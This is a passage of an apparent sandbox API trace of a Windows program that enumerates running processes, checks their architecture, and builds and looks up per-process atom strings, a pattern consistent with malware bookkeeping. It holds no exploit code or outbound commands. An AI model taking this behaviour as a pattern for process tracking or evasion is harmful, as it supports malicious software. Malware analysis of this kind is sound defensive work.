	[0074.395] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.395] CloseHandle (hObject=0x224) returned 1
	[0074.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728858, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.395] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.395] CloseHandle (hObject=0x224) returned 1
	[0074.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.396] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.396] CloseHandle (hObject=0x224) returned 1
	[0074.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.396] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.396] CloseHandle (hObject=0x224) returned 1
	[0074.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e860, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.396] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.396] CloseHandle (hObject=0x224) returned 1
	[0074.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.396] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.396] CloseHandle (hObject=0x224) returned 1
	[0074.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.396] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.396] CloseHandle (hObject=0x224) returned 1
	[0074.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.397] CloseHandle (hObject=0x224) returned 1
	[0074.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.397] CloseHandle (hObject=0x224) returned 1
	[0074.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.397] CloseHandle (hObject=0x224) returned 1
	[0074.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.397] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.397] CloseHandle (hObject=0x224) returned 1
	[0074.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e838, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.398] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.398] CloseHandle (hObject=0x224) returned 1
	[0074.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.398] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.399] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.399] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.399] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.400] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetLastError () returned 0x5
	[0074.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.401] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.401] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.401] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.401] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.401] CloseHandle (hObject=0x224) returned 1
	[0074.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.402] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.402] CloseHandle (hObject=0x224) returned 1
	[0074.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72eb08, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.402] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.402] CloseHandle (hObject=0x224) returned 1
	[0074.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16db8) returned 0xc0000004
	[0074.438] VirtualAlloc (lpAddress=0x0, dwSize=0x16eb8, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16eb8, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dbc0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.442] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.442] CloseHandle (hObject=0x224) returned 1
	[0074.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728958, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.442] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.442] CloseHandle (hObject=0x224) returned 1
	[0074.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728978, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.442] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.442] CloseHandle (hObject=0x224) returned 1
	[0074.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.443] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.443] CloseHandle (hObject=0x224) returned 1
	[0074.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.443] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.443] CloseHandle (hObject=0x224) returned 1
